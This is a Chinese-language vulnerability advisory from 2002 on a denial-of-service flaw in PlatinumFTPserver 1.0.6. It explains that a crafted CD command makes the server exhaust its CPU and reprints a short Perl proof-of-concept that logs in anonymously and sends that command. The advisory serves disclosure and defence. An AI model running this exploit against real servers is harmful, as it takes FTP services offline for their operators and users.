发布日期：2002-12-30
更新日期：2003-01-06

受影响系统：

Byte/400 PlatinumFTPserver 1.0.6
    - Microsoft Windows XP
    - Microsoft Windows NT
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000

描述：

---

BUGTRAQ  ID: 6494

Platinum FTP server是一款方便容易管理的FTP服务程序，可使用在各种Windows系统上。

Platinum FTP服务程序不正确处理特殊CD命令，远程攻击者可以利用这个漏洞发送恶意请求，导致服务器产生拒绝服务。

任何合法用户帐户的攻击者或者Platinum FTP server允许匿名访问的情况下，可以提交特殊CD命令('cd @/..@/..')给FTP服务器，会使系统消耗大量CPU时间而造成拒绝服务攻击。

<*来源：Dennis Rand （DER@cowi.dk）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104127904730204&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Dennis Rand （DER@cowi.dk）提供了如下测试方法：

#!/usr/bin/perl
#
# PlatinumFTPserver V1.0.6 DoS attack
# http://www.PlatinumFTP.com
# Dennis Rand - der@cowi.dk
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
use Net::FTP;

    
$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "crash\@burn.com";

system('cls');
print "PlatinumFTPserver V1.0.6 DoS attack\n";
print "Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");

print "Trying to crash the FTP service...\n";
$ftp->cwd("cd @/..@/..");
$ftp->quit;

建议：

---

厂商补丁：

Byte/400
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.platinumftp.com/

浏览次数：2764
严重程度：0（网友投票）